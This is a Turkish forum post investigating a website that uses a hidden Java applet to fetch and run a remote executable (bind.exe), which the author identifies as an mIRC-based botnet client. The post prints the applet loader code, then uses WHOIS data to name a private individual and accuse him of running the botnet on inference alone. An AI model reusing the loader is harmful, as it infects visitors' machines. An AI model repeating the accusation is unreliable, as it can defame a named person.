http://sonkralice.freevar.com/ girelim. (Girmeyin botnet var
)Sitedeki koddaki document.write'yi alert olarak değişip tarayıcıda açtığımızda şu kod çıkıyor:
<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
<param name="url" value="http://www.sonsigaram.com/bind.exe">
</applet>
Java bind.exe yükleyip çalıştırıyor.
bind.exe'yi virtual machinede inceledim, system32'de Help klasörüne mIRC çıkarıyor (botnet),
sonsigaram.com WHOIS sorgusu yapalım: ns1.yakupkoc.net ns2.yakupkoc.net
yakupkoc.net girdim: footerde "Theme by heLLz"
Googleye yazıyorum: http://www.webforumlari.net/members/13-hellz.html site adresi yakupkoc.net
r10'dakilerde heLLz'in Yakup Koç olduğunu bilir.
Bu durumda ya bu aralar zaten konuşulan sonkralice diye heLLz sonkralice üzerinden botnet client sağlama amacıyla yapmış böylece suçlu sonkralice olacak (nasıl olsa adı kirlenmiş ya) yada sonkralice ona birşey yapmış, buda iftira atma yoluna başvurmuş..
heLLz'in açıklama yapması gerekli
Bu forumda kimse salak değil merak etmeyin
heLLzde host ediliyor demeyin. Zaten heLLz in botnetçi olduğunu ve host satmadığını neredeyse herkes biliyor..
Bu arada bir hatırlatma: sonkralice ile hiçbir şekilde tanışıp/konuşmuşluğum yoktur. Sadece bir araştırayım dedim. -Merak-
Botnetci kimse o 